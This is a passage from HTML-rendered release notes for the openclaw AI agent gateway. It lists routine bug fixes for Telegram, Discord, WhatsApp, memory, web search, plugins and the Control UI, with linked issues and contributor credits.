<p>Telegram/network: raise outbound text and typing Bot API request guards to 60 seconds, keep low grammY client timeouts from preempting those guards, let higher <code>timeoutSeconds</code> configs extend safe method guards, and retry timed-out typing indicators through the transport fallback without risking duplicate messages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368500963" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/76013" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/76013/hovercard" href="https://github.com/openclaw/openclaw/issues/76013">#76013</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/iaki1206/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/iaki1206">@iaki1206</a>.</p>
</li>
<li>
<p>Telegram/native commands: register and clear command menus in both default and group-chat scopes, so <code>/status</code> and plugin commands stay available in forum topics. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347610813" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74032" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74032/hovercard" href="https://github.com/openclaw/openclaw/issues/74032">#74032</a>; updates <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3882532827" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/6457" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/6457/hovercard" href="https://github.com/openclaw/openclaw/pull/6457">#6457</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dae-sun/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dae-sun">@dae-sun</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WouldenShyp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WouldenShyp">@WouldenShyp</a>.</p>
</li>
<li>
<p>Providers/OpenAI: resolve <code>keychain:&lt;service&gt;:&lt;account&gt;</code> <code>OPENAI_API_KEY</code> refs before creating OpenAI Realtime browser sessions or voice bridges, with a bounded cached Keychain lookup. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330678787" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72120" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72120/hovercard" href="https://github.com/openclaw/openclaw/issues/72120">#72120</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ctbritt/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ctbritt">@ctbritt</a>.</p>
</li>
<li>
<p>Discord/gateway: reconnect when the gateway socket closes while waiting for the shared IDENTIFY concurrency window, instead of silently skipping IDENTIFY and leaving the bot online but unresponsive. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4353606299" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74617" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74617/hovercard" href="https://github.com/openclaw/openclaw/issues/74617">#74617</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/zeeskdr-ai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/zeeskdr-ai">@zeeskdr-ai</a>.</p>
</li>
<li>
<p>Voice Call: add <code>sessionScope: "per-call"</code> for fresh per-call agent memory while preserving the default per-phone caller history. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4072126400" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/45280" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/45280/hovercard" href="https://github.com/openclaw/openclaw/issues/45280">#45280</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pondcountry/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pondcountry">@pondcountry</a>.</p>
</li>
<li>
<p>Music generation: raise too-small tool timeouts to the provider-safe 10-second floor and collapse cascading abort fallback errors into a clearer root-cause summary. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shakkernerd/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shakkernerd">@shakkernerd</a>.</p>
</li>
<li>
<p>Memory-core/dreaming: include the primary runtime workspace in multi-agent dreaming sweeps without mixing main-agent session transcripts into configured subagent workspaces. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4307075727" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70014" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70014/hovercard" href="https://github.com/openclaw/openclaw/issues/70014">#70014</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ttomiczek/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ttomiczek">@ttomiczek</a>.</p>
</li>
<li>
<p>Control UI: add tab/RPC timing attribution and decouple slow Overview/Cron secondary refreshes so Sessions navigation gets immediate visible feedback. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4235854543" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64004" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64004/hovercard" href="https://github.com/openclaw/openclaw/issues/64004">#64004</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WaMaSeDu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WaMaSeDu">@WaMaSeDu</a>.</p>
</li>
<li>
<p>Memory: retry transient SQLite index file swaps during atomic reindex on Windows, so brief <code>EBUSY</code>, <code>EPERM</code>, or <code>EACCES</code> locks do not fail memory rebuilds. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4237587612" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64187" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64187/hovercard" href="https://github.com/openclaw/openclaw/issues/64187">#64187</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kunpeng-ai-lab/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kunpeng-ai-lab">@kunpeng-ai-lab</a>.</p>
</li>
<li>
<p>Telegram/startup: use the existing <code>getMe</code> request guard for the gateway bot probe instead of a fixed 2.5-second budget, and honor higher <code>timeoutSeconds</code> configs for slow Telegram API paths. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4366123141" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75783" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75783/hovercard" href="https://github.com/openclaw/openclaw/issues/75783">#75783</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tankotan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tankotan">@tankotan</a>.</p>
</li>
<li>
<p>Telegram/models: make model picker confirmations say selections are session-scoped and do not change the agent's persistent default. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368057405" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75965" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75965/hovercard" href="https://github.com/openclaw/openclaw/issues/75965">#75965</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sd1114820/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sd1114820">@sd1114820</a>.</p>
</li>
<li>
<p>Control UI/slash commands: keep fallback command metadata on a browser-safe registry path, so provider thinking runtime imports cannot blank the Web UI with <code>process is not defined</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368284321" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75987" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75987/hovercard" href="https://github.com/openclaw/openclaw/issues/75987">#75987</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/novkien/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/novkien">@novkien</a>.</p>
</li>
<li>
<p>Heartbeat/Discord: keep async exec completion events out of the generic <code>System (untrusted)</code> prompt block and let the dedicated exec heartbeat prompt handle them, so Discord no longer receives raw exec failure tails as separate system-style messages. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4259713936" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66366" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66366/hovercard" href="https://github.com/openclaw/openclaw/issues/66366">#66366</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Promee-ThaBossHoss/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Promee-ThaBossHoss">@Promee-ThaBossHoss</a>.</p>
</li>
<li>
<p>Channels: strip plain-text MiniMax and XML tool-call scaffolding from shared user-facing reply sanitization, so messaging channels do not deliver raw model tool syntax when a provider emits it as text instead of structured tool calls. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4221535812" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62820" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62820/hovercard" href="https://github.com/openclaw/openclaw/issues/62820">#62820</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/canh0chua/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/canh0chua">@canh0chua</a>.</p>
</li>
<li>
<p>Infer/media: report missing image-understanding and audio-transcription provider configuration for <code>image describe</code>, <code>image describe-many</code>, and <code>audio transcribe</code> instead of blaming the input path when no provider is available. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343347839" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73569" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73569/hovercard" href="https://github.com/openclaw/openclaw/issues/73569">#73569</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343748623" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73593" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73593/hovercard" href="https://github.com/openclaw/openclaw/pull/73593">#73593</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349938490" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74288" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74288/hovercard" href="https://github.com/openclaw/openclaw/pull/74288">#74288</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4352412851" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74495" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74495/hovercard" href="https://github.com/openclaw/openclaw/pull/74495">#74495</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bittoby/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bittoby">@bittoby</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/tmimmanuel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/tmimmanuel">@tmimmanuel</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Linux2010/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Linux2010">@Linux2010</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vyctorbrzezowski/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vyctorbrzezowski">@vyctorbrzezowski</a>.</p>
</li>
<li>
<p>Docs/health: clarify that session listing surfaces stored conversation rows rather than Discord/channel socket liveness, and point connectivity checks at channel status and health probes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4312712740" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/70420" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/70420/hovercard" href="https://github.com/openclaw/openclaw/issues/70420">#70420</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ashersoutherncities-art/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ashersoutherncities-art">@ashersoutherncities-art</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>.</p>
</li>
<li>
<p>WhatsApp/Cron: keep DM pairing-store approvals out of implicit cron and heartbeat recipient fallback, so scheduled automation only uses explicit targets, active configured recipients, or configured <code>allowFrom</code> entries. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4215965103" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62339" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62339/hovercard" href="https://github.com/openclaw/openclaw/issues/62339">#62339</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/kelvinisly-collab/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/kelvinisly-collab">@kelvinisly-collab</a>.</p>
</li>
<li>
<p>Google Meet: keep the agent-facing <code>google_meet</code> tool visible on non-macOS hosts but block local Chrome realtime actions with guidance, so Linux agents can still use transcribe, Twilio, chrome-node, and artifact flows without choosing the macOS-only BlackHole path. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367913692" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75950" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75950/hovercard" href="https://github.com/openclaw/openclaw/issues/75950">#75950</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/actual-software-inc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/actual-software-inc">@actual-software-inc</a>.</p>
</li>
<li>
<p>macOS/settings: keep opening General from rewriting <code>openclaw.json</code> during Tailscale settings hydration, preserving <code>gateway</code>, <code>auth</code>, <code>meta</code>, and <code>wizard</code> until the user changes a setting. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4192663996" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59545" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59545/hovercard" href="https://github.com/openclaw/openclaw/issues/59545">#59545</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Tengdw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Tengdw">@Tengdw</a>.</p>
</li>
<li>
<p>Discord: prioritize interaction callbacks ahead of stale background REST work without polling active REST buckets, validate oversized gateway payloads and member-intent requests before send, and forward explicit component payloads from message actions. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362439940" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75363" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75363/hovercard" href="https://github.com/openclaw/openclaw/pull/75363">#75363</a>)</p>
</li>
<li>
<p>Active Memory: use the configured recall timeout as the blocking prompt-build hook budget by default and move cold-start setup grace behind explicit <code>setupGraceTimeoutMs</code> config, so the plugin no longer silently extends 15000 ms configs to 45000 ms on the main lane. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367042978" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75843" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75843/hovercard" href="https://github.com/openclaw/openclaw/issues/75843">#75843</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vishutdhar/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vishutdhar">@vishutdhar</a>.</p>
</li>
<li>
<p>Plugins/web-provider: reuse the active gateway plugin registry for runtime web provider resolution after deriving the same candidate plugin ids as the loader path, avoiding a redundant <code>loadOpenClawPlugins</code> call on every request while preserving origin and scope filters. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4363428779" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75513" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75513/hovercard" href="https://github.com/openclaw/openclaw/issues/75513">#75513</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jochen/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jochen">@jochen</a>.</p>
</li>
<li>
<p>Crestodian/CLI: exit non-zero when interactive Crestodian is invoked without a TTY, so scripts and CI no longer treat the setup error as success. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344381793" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73646" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73646/hovercard" href="https://github.com/openclaw/openclaw/issues/73646">#73646</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347317157" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73928" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/73928/hovercard" href="https://github.com/openclaw/openclaw/pull/73928">#73928</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4347801211" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74059" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/74059/hovercard" href="https://github.com/openclaw/openclaw/pull/74059">#74059</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bittoby/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bittoby">@bittoby</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/luyao618/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/luyao618">@luyao618</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Linux2010/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Linux2010">@Linux2010</a>.</p>
</li>
<li>
<p>Cron: keep implicit/default isolated cron announce deliveries out of the main session awareness queue, so isolated jobs do not accumulate in the main conversation. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4208027555" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61426" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/61426/hovercard" href="https://github.com/openclaw/openclaw/issues/61426">#61426</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lihannon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lihannon">@Lihannon</a>.</p>
</li>
<li>
<p>Subagents: avoid duplicate parent-visible replies when a parent uses <code>sessions_send</code> on its own persistent native subagent session, while preserving announce delivery for async sends. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4342979045" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73550" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73550/hovercard" href="https://github.com/openclaw/openclaw/issues/73550">#73550</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sylviazhang2006-design/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sylviazhang2006-design">@sylviazhang2006-design</a>.</p>
</li>
<li>
<p>Web search/Brave: add opt-in <code>brave.http</code> diagnostics for Brave request URLs/query params, response status/timing, and cache hit/miss/write events without logging API keys or response bodies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4144203570" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55196" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55196/hovercard" href="https://github.com/openclaw/openclaw/issues/55196">#55196</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/mecampbellsoup/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/mecampbellsoup">@mecampbellsoup</a>.</p>
</li>
<li>
<p>Web search/Brave: add <code>plugins.entries.brave.config.webSearch.baseUrl</code> for Brave-compatible proxies, including endpoint-aware cache keys for both web and LLM Context modes. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3951923414" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/19075" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/19075/hovercard" href="https://github.com/openclaw/openclaw/issues/19075">#19075</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jkoprax/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jkoprax">@jkoprax</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vishnukool/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vishnukool">@vishnukool</a>.</p>
</li>
<li>
<p>Web search/config: validate explicit <code>tools.web.search.provider</code> values against bundled and installed plugin manifests, while warning for stale third-party plugin config. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4123070790" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53092" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53092/hovercard" href="https://github.com/openclaw/openclaw/issues/53092">#53092</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TinyTb/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TinyTb">@TinyTb</a>.</p>
</li>
<li>
<p>Web search/SearXNG: retry empty non-general category searches once with the general category, so unsupported category engines do not return empty results when general search has matches. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4343014523" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73552" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73552/hovercard" href="https://github.com/openclaw/openclaw/issues/73552">#73552</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Loukky/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Loukky">@Loukky</a>.</p>
</li>
<li>
<p>CLI/message: skip gateway-stop hooks for read-only <code>message read</code> and bound stop-hook shutdown for other message actions, so one-shot Discord reads cannot hang behind plugin lifecycle cleanup.</p>
</li>
<li>
<p>Plugins/web-provider: cache repeated bundled web search and web fetch provider registry loads by default while preserving explicit cache opt-outs. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4368302945" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75992" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/75992/hovercard" href="https://github.com/openclaw/openclaw/pull/75992">#75992</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/DmitryPogodaev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/DmitryPogodaev">@DmitryPogodaev</a>.</p>
</li>
<li>
<p>Agents/sandbox: preserve existing workspace file modes when sandbox edits atomically replace files, so 0644 files do not collapse to 0600 after Write/Edit/apply_patch. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4064748597" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44077" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44077/hovercard" href="https://github.com/openclaw/openclaw/issues/44077">#44077</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/patosullivan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/patosullivan">@patosullivan</a>.</p>
</li>
<li>
<p>Control UI/WebChat: route typed <code>/new</code> through the New Chat dashboard-session creation flow instead of <code>chat.send</code>, while keeping <code>/reset</code> as the explicit current-session reset. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4300356598" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69599" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69599/hovercard" href="https://github.com/openclaw/openclaw/issues/69599">#69599</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/WolvenRA/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/WolvenRA">@WolvenRA</a>.</p>
</li>
<li>
<p>Agents/models: keep legacy CLI runtime model refs such as <code>claude-cli/*</code> in the configured allowlist after canonical runtime migration, so cron <code>payload.model</code> overrides keep working. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4365669096" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75753" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75753/hovercard" href="https://github.com/openclaw/openclaw/issues/75753">#75753</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RyanSandoval/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RyanSandoval">@RyanSandoval</a>.</p>
</li>
<li>
<p>Codex/app-server: restart the shared Codex app-server client once when it closes during startup thread resume, preserving the existing thread binding instead of retrying <code>thread/start</code> on a closed client. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Gateway/watch: keep colored subsystem log prefixes in the managed tmux pane even when the parent shell exports <code>NO_COLOR</code>, while preserving explicit <code>FORCE_COLOR=0</code> opt-out. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Agents/compaction: submit a non-empty runtime-event marker for pre-compaction memory flush turns, so strict Anthropic providers no longer reject the silent flush as an empty user message. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4361911066" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75305" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75305/hovercard" href="https://github.com/openclaw/openclaw/issues/75305">#75305</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sableassistant3777-source/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sableassistant3777-source">@sableassistant3777-source</a>.</p>
</li>
<li>
<p>Plugin SDK: re-export <code>isPrivateIpAddress</code> from <code>plugin-sdk/ssrf-runtime</code>, restoring source-checkout builds for SearXNG and Firecrawl private-network guards. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</p>
</li>
<li>
<p>Discord/message actions: advertise <code>upload-file</code> and route it through Discord's send runtime with agent-scoped media reads, so agents can discover and send file attachments. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4203171087" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60652" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/60652/hovercard" href="https://github.com/openclaw/openclaw/issues/60652">#60652</a> and supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4204560464" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60808" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60808/hovercard" href="https://github.com/openclaw/openclaw/pull/60808">#60808</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4206054244" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61087" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61087/hovercard" href="https://github.com/openclaw/openclaw/pull/61087">#61087</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4206088150" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61100" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61100/hovercard" href="https://github.com/openclaw/openclaw/pull/61100">#61100</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/claw-io/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/claw-io">@claw-io</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/efe-arv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/efe-arv">@efe-arv</a>, <a class="user-mention notranslate" data-hovercard-type="user" 